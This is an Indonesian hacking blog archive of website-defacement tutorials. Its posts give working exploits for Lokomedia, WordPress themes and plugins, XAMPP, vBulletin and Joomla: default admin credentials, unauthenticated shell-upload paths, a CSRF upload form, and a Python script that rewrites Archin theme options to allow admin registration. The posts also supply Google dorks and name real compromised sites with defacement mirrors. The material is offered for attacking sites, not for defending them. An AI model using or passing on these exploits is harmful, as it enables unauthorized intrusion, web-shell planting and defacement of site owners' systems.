Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Selasa, 21 Januari 2014

Exploit CMS Lanang Mulia Uploader Vulnerability

Posted by Erza Jullian 23.25, under | No comments

kali ini ane mau share exploit yang ane dapet kemarin dari seortang teman di facebook. namanya Exploit Lanang Mulia Uploader Vulnerability. Bugnya hampir mirip dengan Bug Upload pada CMS Lokomedia. Setelah ane masuk ke dalamnya pun ternyata cms ini hampir sama dengan Lokomedia.

Oke langsung saja ane share exploitnya :



Exploit Title: Lanang Mulia Uploader Vulnerability

Google Dork:

intext:" Web By: lanangmulia.net"

inurl:showdetail.php?mod=

Untuk dork lain kembangkan sendiri, use your brain ;)



Exploit :

[localhost]/admin/upload_1.php

Jika belum di patch, disitu kalian bisa langsung upload shell kalian tanpa harus tamper data maupun login :D

Nah, nanti shell akan terletak di

[localhost]/foto/namashell.php



Sekian tutorial kali ini, semoga bermanfaat .

Thanks to : BarrabravaZ



Jumat, 10 Januari 2014

Tutorial Deface dengan Bug CMS Lokomedia

Posted by Erza Jullian 13.51, under , | No comments

Sebelumnya ane kasih info kalau Lokomedia adalah CMS asli buatan Indonesia jadi kalau kalian nemu bug nya jangan diobrak abrik ya . Contact adminnya atau kalo bisa di patch ssekalian. :D

Sebenarnya ini bug lama sih. tapi jika kalian sabar dan beruntung tentunya, kalian tetap bisa mendapatkan target vuln dengan bug Lokomedia.

Ada banyak bug lokomedia. Ane jelasin satu satu.



Lokomedia Default Password .

Banyak admin admin situs yang tidak mengubah default password dari CMS Lokomedia.

caranya :

Masuk ke login adminnya di localhost/admin/ atau localhost/adminweb/

Dan berikut adalah daftar user serta password CMS Lokomedia

admin : admin

wiro : sableng

sinto : gendeng

joko : sembung



Bug Upload di CMS Lokomedia

nah, kalo yang ini, kadang script lama  lokomedia belum diupdate sama webmasternya sehingga kita bisa melakukan upload dari halaman admin tanpa login. ataupun kita bisa melakukan aksi add user .

Jika emmang bug nya add user, caranya adalah masuk ke

site/adminweb/content.php?module=user lalu tambahkan user serta password disitu.

Selanjutnya kalian bisa login di /adminweb/ atau /admin/ (tergantung letak halaman loginnya)



Lalu yang kedia adalah bug di modul download

site/adminweb/content.php?module=download . disitu kalian bisa upload shell kalian, dan letak file nya adalah di site/files/namashell.php .



Yang ketiga adalah bug di modul banner.

yaitu di site/adminweb/content.php?module=banner . kalian langsung saja tambahkan banner . letak shellnya ada di site/foto_banner/namashell.php .



Oke, kali ini ane nemu web dengan bug add banner di ikamesinits.org .

masuk ke http://www.ikamesinits.org/adminweb/content.php?module=banner



lalu klik "tambah Banner"



Setelah upload selesai kadang memang ada notice "anda harus login"

tapi coba kita lihat apa upload nya berhasil, cek di

http://www.ikamesinits.org/adminweb/content.php?module=banner



Berhasil kan ? :D

Akses shellnya di site/foto-banner/namashell.php

Karena ane tadi upload file sendy.php , maka file nya ada di

http://www.ikamesinits.org/foto_banner/sendy.php





Sekarang terserah kalian mau diapain tuh site :*



www.ikamesinits.org



Sekian dan jangan disalahgunakan :D

Use at Your Own Risk !!

Jumat, 15 November 2013

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

Posted by Erza Jullian 15.03, under | No comments

Oke, kali ini saya mau share exploit yang baru ditemukan kemarin yaitu Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability. caranya cukup mudah kok. Langsung saja ikuti tutorialnya :

Bahan-bahan :



HTML Exploiter Download Disini | save dengan format .html



Vulnerability :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Dork :

use your brain bitch :p

Shell Location :

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Langkah-langkah :

Oke, langsung saja nyelem ke google nyari target vuln. :p

Contoh target saya adalah http://mbrinformatique.com/

Ubah url nya menjadi

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Jika error, berarti vuln :D





Langkah kedua, buka HTML Exploiter diatas dan edit bagian http://127.0.0.1/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php dengan web yang vuln.

save kembali lalu buka lewat browser. :p



nah tuh, upload shell nya lewat situ. maka kalo sudah sukses kalian akan mendapatkan nama acak. Misal :

1384522165528621b5f41fe.php



maka letak shell kalian ada di

[localhost]/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/[randomname].php



Contoh :

http://mbrinformatique.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/1384522165528621b5f41fe.php





Kalo sudah seperti ituya terserah mau diapain -_-





http://mbrinformatique.com/devil.html

Mirror



Thanks to founder of this exploit :

Bebyyers404 | JKT48 CYBER TEAM - Black Devil Crew



Sekian tutorial kali ini semoga bermanfaat :)

Sabtu, 09 November 2013

WordPress Army Knife CSRF File Upload Vulnerability

Posted by Erza Jullian 15.57, under | No comments



Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability

Author: Bebyyers404

Date: 11/09/2013

Vendor Homepage: http://freelancewp.co



Themes Link: http://freelancewp.com/wordpress-theme/army-knife/

Infected File: upload-handler.php

Category: webapps/php

Google dork: inurl:/wp-content/themes/armyknife

Tested on : Windows/Linux



Exploit & POC :

 

<form enctype="multipart/form-data"

action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

 

File path:

http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php





./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo



JKT48 CYBER TEAM & Black Devils Crew

Rabu, 16 Oktober 2013

XAMPP All Version Local Write Access Vulnerability

Posted by Erza Jullian 12.00, under | 1 comment

Kali ini saya akan share salah satu exploit yang mungkin tergolong mudah untuk dipraktekkan. XAMPP All Version Local Write Access Vulnerability. Oke langsung saja ya. Ini exploit lagi rame sekarang :D

Google Dork :

inurl:/xampp/lang.php

inurl:/security/lang.php

Use your brain :p



Exploit :

http://localhost/[path]/xampp/lang.php?WriteIntoLocalDisk

http://localhost/[path]/security/lang.php?WriteIntoLocalDisk



Langkah langkah :

Mulai berselancardi google dan cari target .

Contoh : http://www.aquadivarigotti.it/security/lang.php

Tinggal masukkan exploitnya, contohnya menajdi http://www.aquadivarigotti.it/security/lang.php?hacked_by_Nabilaholic404



Hasilnya terletak di http://localhost/[path]/xampp/lang.tmp atau http://localhost/[path]/security/lang.tmp



Contoh

http://www.aquadivarigotti.it/security/lang.tmp






Mirror


http://www.zone-h.org/mirror/id/20996159



Sekian tutorial kali ini, semoga bermanfaat :)

Sabtu, 12 Oktober 2013

Exploit Joomla Com_User Server Scanner (Python)

Posted by Erza Jullian 15.34, under , | No comments

Oke langsung saja ya. Tools ini berguna seperti JCE Scanner, namun yang ini untuk checking web vuln com_user dalam satu server. Ini direcode oleh teman saya ./Pscript . Thanks banget ya om :D .Scanner ini berekstensi .py (file python) .

Berikut link download nya :

Download Com_User Scanner

Simpan dengan ekstensi file.py . Contoh : comuser.py

lalu jalankan lewat cmd. Tinggal masukkan IP Server yang ingin di scan :D





Sekian dan semoga bermanfaat.

Minggu, 06 Oktober 2013

Exploit Chiangraientersoft HTML Injection

Posted by Erza Jullian 16.12, under | No comments

Oke langsung saja ya. Ini exploit yang saya baca semalam di Forum Newbie-Sec .

Google Dork :

inurl:Qread.php?id_ques=

inurl:webboard/Qread.php?id_ques=

Vulnerable at 'Qform.php' at Field Subject/Title



Langkah langkah :

Pertama , dorking dulu nyari target vuln.

Sebagai contoh, target saya adalah : http://www.friends-inter.com/webboard/Qread.php?id_ques=16

Ubah url nya menjadi :

http://www.friends-inter.com/webboard/Qform.php

Nah, ada form yang harus diisi :

Form Subject (paling atas) isi dengan kode html.

lainnya isi ngawur aja kecuali kode chaptcha yang paling bawah.





Dan hasilnya ada di indexnya ;)

http://www.friends-inter.com/webboard/





Sekian tutorial kali ini, semoga bermanfaat .

Thanks to :

Newbie-Security

Senin, 30 September 2013

CMS Blogspot (Blogger) XSS Vulnerability

Posted by Erza Jullian 14.32, under | No comments

Sebenarnya saay sendiri masih bingung ini sebenarnya bug baru atau sudah lama. Namun baru dua hari yang lalu saay tau ketika www.madura-cyber.org yang juga ber CMS blogspot di XSS dan di submit ke Zone-H oleh Janda a.k.a DevilScreaM . Letak bug nya adalah di bagian /feeds/.

Exploit :

site/feeds/posts/default?orderby=(xss)

site/feeds/posts/(xss)



Saya kasih contoh blog temen saya sendiri aja :p

http://www.let-softing.net/feeds/posts/default?orderby=Tested+by+Nabilaholic404




Blogspot XSS Vuln :p



http://www.let-softing.net/feeds/posts/Tested+by+nabilaholic404







Semoga cepat diperbaiki karena suram makin banyak web ber CMS blogspot masuk zone-h -_-

Sabtu, 14 September 2013

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit

Posted by Erza Jullian 16.37, under | No comments

Oke, ini sebenarnya exploit yang dipublish sekitar seminggu yang lalu. tapi saya baru mempraktekkannya semalam. Dan langsung saya share disini.

Oke, bahan-bahan yang diperlukan adalah



PHP Exploit : Click Here

Dork :

Use Your Brain Bitch !!!! :p



Exploit :

localhost/vb/install/upgrade.php



Sebelumnya, dan ini yang penting untuk kesuksesan praktek, bilang Yuyud Ganteng 1000x

Yuyud Ganteng

Yuyud Ganteng

Yuyud Ganteng




Yuyud Ganteng


Yuyud Ganteng 


Yuyud Ganteng




Yuyud Ganteng


Yuyud Ganteng 


Yuyud Ganteng




Yuyud Ganteng


Yuyud Ganteng 


Yuyud Ganteng




Yuyud Ganteng


Yuyud Ganteng 


Yuyud Ganteng


.....................


dan seterusnya :3









langsung ke langkah pertama, ambil script php explit nya, simpan dengan format .php . Setelah itu terserah mau dijalankan di localhost atau mau diupload di web. :)

Mulai berselancar di google nyari target.

Sebagai contoh, target saya adalah http://www.mayzus.my/forum/install/upgrade.php





Anda akan diminta memasukkan customer ID. Ctrl+U dan cari kata CUSTNUMBER .

Disitu ada customer ID nya . Untuk lebih jelasnya lihat ss dibawah :



Langkah ke tiga adalah , buka php exploit yang sudah kalian persiapkan diatas, dan masukkan data-data nya. Untuk username, password dan email silahkan isi sembarang. penting mudah diingat.



Tunggu prosesnya. Lihat ss :



Di situ tertulis "Administrator Account Created" , terlalu lama kalo kita menunggu sampai 18 Langkah.

Langsung s aja ke halaman login. localhost/forum/admincp/

Masukkan user dan password yang sudah dibuat sebelumnya.



Sipp, login sukses !!!



Kalo udah gitu terserah mau diapain :p




Hacked !!!

http://www.mayzus.my/forum/faq.php

Mirror



Sekian dan terimakasih.

Salam ganteng



NB : Tolong yang mau copas kasih sumber. Jangan belajar jadi maling bangsat !!!



./Nabilaholic404

Kamis, 29 Agustus 2013

Deface Dengan Exploit Joomla Com_User

Posted by Erza Jullian 16.00, under | No comments

Oke, sebenarnya ini cara lama sih :v . Tapi karena saya bari kemarin tertarik untuk menggunakan exploit ini, jadi ya baru sekarang saya share di blog . :v . Oke, langsung saja sob .

Bahan bahan yang di perlukan :

Joomla Exploit Com_User (save dengan format html)

Dork : intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com (kembangkan sendiri)

Exploit : /index.php?option=com_users&view=registration

Oke, mulai dorking di google :p . saya ambil contoh askandans.com . Lalu masukkan exploitnya www.askandans.com/index.php?option=com_users&view=registration

Maka anda akan dibawa ke halaman registrasi :



Coba ctrl+u , lalu ctrl+f . cari kata hidden" . Cari kode seperti di bawah :





Sekarang, buka file html exploit joomla yang sudah sobat download tadi, isi data-datanya dengan benar :



Jangan lupa juga sesuaikan code yang tadi sudah anda dapatkan :





Lalu buka file html nya lewat browser, klik register :











Sukses !







Tinggal cek email, dan aktivasi :



Tinggal login dengan user dan password tadi :







Sekarang terserah anda mau diapain . hahahahaha

Sekian dan semoga bermanfaat :)

Sabtu, 24 Agustus 2013

Deface Wordpress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Posted by Erza Jullian 05.27, under , | No comments

Oke, langsung saja ya bro, soalnya ane buru-buru mau malem mingguan :v . Ane prakteknya di Windows, jadi yang pakek linux ngikutin aja sebisanya. Bagi yang pake windows, wajib install Python dulu. Sttelah itu, buka notepad, dan pastekan script berikut :

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access

# Date: Sept 29, 2012

# Exploit Author: bwall (@bwallHatesTwits)

# Vendor Homepage: http://themeforest.net/user/wptitans

# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432

# Version: 3.2

# Tested on: Ubuntu

import httplib, urllib



#target site


site = "situs.com"

#path to ajax.php

url = "wp-content/themes/archin/hades_framework/option_panel/ajax.php"



def ChangeOption(site, url, option_name, option_value):


params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}

conn = httplib.HTTPConnection(site)

conn.request("POST", url, params, headers)

response = conn.getresponse()

print response.status, response.reason

data = response.read()

print data

conn.close()



ChangeOption(site, url, "admin_email", "akicha@jkt48-cyber.org")

ChangeOption(site, url, "users_can_register", "1")

ChangeOption(site, url, "default_role", "shintanaomi")

print "Now register a new user, they are an shintanaomi by default!"



Save di direktori C: dengan nama archin.py (untuk memudahkan saja) .

Langkah selanjutnya, dorking di google dengan dork berikut :

/wp-content/themes/vithy/hades_framework/ (kembangkan sendiri)

Setelah nemu target, coba di ctrl + u .





Lalu edit archin.py , sesuaikan dengan target diatas :D

ganti situs.com dengan basement-pa.de

ganti archin dengan vithy

ganti akicha@jkt48-cyber.org dengan email anda

ganti shintanaomi dengan user keinginan anda. :p



Langkah selanjutnya, buka CMD, lalu ketik cd\

Setelah itu, ketik lagi archin.py

Tunggu sampai proses selesai :D



Sekarang buka http://www.basement-pa.de/wp-login.php?action=register

Masukkan data, dan cek email , maka anda akan mendapat password nya :D





Sekarang coba login dengan user dan password yang didapat :D



Lolz, login sukses :v

Tapi bangke ni situs gak bisa edit themes -_-

Install plugins juga gak bisa :3

jadi ya gini aja deh :D

http://www.basement-pa.de/hacked/

Mirror



Sekian dan terimakasih :D

Thanks to : Gay MUHAMMAD TAREGH AZZIS

Blog Archive

Blog Archive